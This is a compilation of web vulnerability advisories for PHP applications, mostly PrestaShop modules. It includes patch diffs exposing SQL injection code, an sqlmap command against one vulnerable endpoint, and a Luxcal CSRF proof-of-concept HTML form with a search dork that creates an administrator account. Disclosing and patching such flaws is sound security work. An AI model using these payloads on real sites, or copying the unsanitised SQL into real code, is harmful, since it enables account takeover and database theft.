SQL injection vulnerability in Prestashop opartplannedpopup 1.4.11 and earlier allows remote attackers to run arbitrary SQL commands via OpartPlannedPopupModuleFrontController::prepareHook() method.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Opart planned popup” (opartplannedpopup) up to version 1.4.11 from Opart for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-34577
*   **Published at**: 2023-09-19
*   **Platform**: PrestaShop
*   **Product**: opartplannedpopup
*   **Impacted release**: <= 1.4.11 (1.4.12 fixed the vulnerability)
*   **Product author**: Opart
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Methods OpartPlannedPopupModuleFrontController::prepareHook() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop specific controller and most attackers can conceal this controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data on the associated PrestaShop
*   Copy/past datas from sensibles tables to FRONT to exposed tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijacked emails

**Patch from 1.4.11**

    --- 1.4.11/modules/opartplannedpopup/opartplannedpopup.php
    +++ 1.4.12/modules/opartplannedpopup/opartplannedpopup.php
    ...
    private function prepareHook()
    	{
    		$where = '';
    
    		if (get_class($this->context->controller) == 'OrderController')
    		{
                if (Tools::getIsset('step')) {
                    $current_step = Tools::getValue('step');
                } else {
                    $current_step = 0;
                }
    -			$where = 'p.display_order="" OR (p.display_order LIKE "'.$current_step.'" OR ';
    +			$where = 'p.display_order="" OR (p.display_order LIKE "'.(int)$current_step.'" OR ';
    -			$where .= 'p.display_order LIKE "'.$current_step.',%" OR p.display_order LIKE "%,'.$current_step.',%" OR ';
    +			$where .= 'p.display_order LIKE "'.(int)$current_step.',%" OR p.display_order LIKE "%,'.(int)$current_step.',%" OR ';
    -			$where .= 'p.display_order LIKE "%,'.$current_step.'")';
    +			$where .= 'p.display_order LIKE "%,'.(int)$current_step.'")';
    		}
    

**Other recommandations**

*   It’s recommended to upgrade to the latest version of the module **opartplannedpopup**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-10-04

Issue discovered during a code review by TouchWeb.fr

2022-10-04

Contact Author to confirm version scope

2022-10-04

Author confirm versions scope

2023-05-24

Request CVE ID

2023-09-05

Received CVE ID

2023-09-19

Publish this security advisory

Opart thanks TouchWeb.fr and Creabilis.com for their courtesies and their help after the vulnerability disclosure.

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-34577: [CVE-2023-34577] Improper neutralization of SQL parameter in Opart Planned popup for PrestaShop

Luxcal Event Calendar version 3.2.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Luxcal Event Calendar v3.2.3 CSRF Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            |  
| # Vendor    : https://www.LuxSoft.eu                                                                                             |  
| # Dork      : powered by LuxSoft                                                                                                 |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

[+] infected file : index.php

[+] http://127.0.0.1/q7.3/index.php.

[+] save code as poc.html .

<html>  
<form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add">  
<input type="hidden" name="uname" value="tcyber"/>  
<input type="hidden" name="email" value="g4k@hot.mail"/>  
<input type="hidden" name="new_pw" value="123456"/>  
<input type="hidden" name="userRights" value="9"/>  
<input type='submit' name='addExe' value="Add Profile">  
</form>  
</html>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Luxcal Event Calendar 3.2.3 Cross Site Request Forgery

Phpjabbers PHP Shopping Cart 4.2 is vulnerable to SQL Injection via the id parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-43274: CVE-nu11secur1ty/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2 at main · nu11secur1ty/CVE-nu11secur1ty

web\ViewAction in Yii (aka Yii2) 2.x before 2.0.5 allows attackers to execute any local .php file via a relative path in the view parameeter.

**Yii2 allows attackers to execute any local .php file via a relative path in the view parameter**

Moderate severity GitHub Reviewed Published Sep 21, 2023 to the GitHub Advisory Database • Updated Sep 21, 2023

GHSA-7cfq-72w2-24q4: Yii2 allows attackers to execute any local .php file via a relative path in the view parameter

CVE-2015-5467: security-advisories/yiisoft/yii2-dev/CVE-2015-5467.yaml at master · FriendsOfPHP/security-advisories

SQL injection vulnerability in PrestaShop opartsavecart through 2.0.7 allows remote attackers to run arbitrary SQL commands via OpartSaveCartDefaultModuleFrontController::initContent() and OpartSaveCartDefaultModuleFrontController::displayAjaxSendCartByEmail() methods.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Opart Save Cart” (opartsavecart) up to version 2.0.7 from Opart for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-34575
*   **Published at**: 2023-09-19
*   **Platform**: PrestaShop
*   **Product**: opartsavecart
*   **Impacted release**: <= 2.0.7 (2.0.8 fixed the vulnerability)
*   **Product author**: Opart
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Methods OpartSaveCartDefaultModuleFrontController::initContent() and OpartSaveCartDefaultModuleFrontController::displayAjaxSendCartByEmail() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 2.0.7**

    --- 2.0.7/modules/opartsavecart/controllers/front/default.php
    +++ 2.0.8/modules/opartsavecart/controllers/front/default.php
    ...
                         } else {
                             $idCart = Tools::getValue('opartCartId');
    -                        $sql = "DELETE FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE id_cart=" . $idCart . " AND id_customer=" . $idCustomer;
    +                        $sql = "DELETE FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE id_cart=" . (int)$idCart . " AND id_customer=" . (int)$idCustomer;
                             Db::getInstance()->execute($sql);
    ...
                             //check if cart exist for this customer
                             if (Tools::getIsset('opartCartId') && Tools::getValue('opartCartId')) {
                                 $idCart = Tools::getValue('opartCartId');
    -                            $sql = "SELECT * FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE id_customer=" . $idCustomer . " AND id_cart=" . $idCart;
    +                            $sql = "SELECT * FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE id_customer=" . (int)$idCustomer . " AND id_cart=" . (int)$idCart;
                             } else if (Tools::getIsset('token') && Tools::getValue('token')) {
                                 $token = Tools::getValue('token');
    -                            $sql = "SELECT * FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE token = '" . $token . "'";
    +                            $sql = "SELECT * FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE token = '" . pSQL($token) . "'";
                             }
    ...
    
                 if (Validate::isEmail($email)) {
    -                $sql = "SELECT * FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE token = '" . $token . "'";
    +                $sql = "SELECT * FROM `" . _DB_PREFIX_ . "opartsavecart` WHERE token = '" . pSQL($token) . "'";
                     $result = Db::getInstance()->getRow($sql);
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **opartsavecart**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-05-23

Issue discovered during a code review by TouchWeb.fr

2023-05-23

Contact Author to confirm version scope

2023-05-23

Author confirms versions scope

2023-05-24

Request CVE ID

2023-09-05

Received CVE ID

2023-09-19

Publish this security advisory

Opart thanks TouchWeb for its courtesy and its help after the vulnerability disclosure.

**Links**

*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-34575: [CVE-2023-34575] Improper neutralization of SQL parameter in Opart Save Cart for PrestaShop

SimpleImportProduct Prestashop Module v6.2.9 was discovered to contain a SQL injection vulnerability via the key parameter at send.php.

This blog post details an SQL Injection we found within SimpleImportProduct, a Prestashop module developed by MyPrestaModules. In modules/simpleimportproduct/send.php there is the following code:

      if ( Tools::getValue('remove') == true){  
        $key = Tools::getValue('key');  
        $key = pSQL($key);  
        Db::getInstance()->delete('simpleimport_tasks', "import_settings=$key");
    

This is vulnerable to SQL injection which allows an attacker to extract data from the database.  
The key parameter does get sanitized by pSQL() but when it’s put in the query it’s not surrounded by quotes so an attacker can still manipulate the query. This is a similar situation to an SQLi I found in a different Prestashop module.

Adding quotes around the key would be sufficient to patch this SQLi:

    Db::getInstance()->delete('simpleimport_tasks', "import_settings='$key'");
    

**Proof of Concept**

To test this we used SQLmap on a local Prestashop install. Care should be taken when testing for this as it is within a DELETE SQL query and can result in records getting deleted. SQLMap command:

    sqlmap -u "http://localhost:8080/modules/simpleimportproduct/send.php?ajax=true&remove=true&key=1*" --threads=10 --random-agent --dbms=mysql --level=5 --risk=3 --tables  
    

It’s a “blind” SQLi as it doesnt affect the contents of the page so information is extracted using SLEEP() to change the time it takes to respond.

**Timeline**

Date

Action

10/07/2023

Issue discovered during a pentest

12/07/2023

Reported issue to MyPrestaModules

29/07/2023

Requested CVE from MITRE

??/08/2023

Patch released

28/08/2023

Number CVE-2023-39675 assigned

07/09/2023

Blog post released

CVE-2023-39675: SQLi in SimpleImportProduct Prestashop Module CVE-2023-39675

A reflected cross-site scripting (XSS) vulnerability in msaad1999's PHP-Login-System 2.0.1 allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'selector' parameter in '/reset-password'.

CVE-2023-38876: vulnerability-research/CVE-2023-38876 at main · dub-flow/vulnerability-research

A reflected cross-site scripting (XSS) vulnerability in msaad1999's PHP-Login-System 2.0.1 allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'validator' parameter in '/reset-password'.

CVE-2023-38875: vulnerability-research/CVE-2023-38875 at main · dub-flow/vulnerability-research

Cross Site Request Forgery (CSRF) vulnerability in icmsdev iCMSv.7.0.16 allows a remote attacker to execute arbitrary code via the user.admincp.php, members.admincp.php, and group.admincp.php files.

\[CVE-ID\]

CVE-2023-42321

\[CNVD-ID\]

CNVD-2023-68150

\[Description\]

In the iCMS V7.0.16 version, the session in the session is hijacked, and members, roles and administrator accounts can be added arbitrarily without logging in to the account.

\------------------------------------------

\[Vulnerability Type\]

Insecure Permissions

\------------------------------------------

\[Vendor of Product\]

icmsdev

\------------------------------------------

\[Affected Product Code Base\]

icms - V7.0.16

\------------------------------------------

\[Affected Component\]

Backend-User Management-Add Administrator/Add Member/Member Management/Role Management, etc.

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Code execution\]

true

\------------------------------------------

\[Impact Information Disclosure\]

true

\------------------------------------------

\[Attack Vectors\]

Hijack the session in the session

\------------------------------------------

\[Reference\]

https://www.icmsdev.com/

\------------------------------------------

\[Discoverer\]

chubby

Tag

#php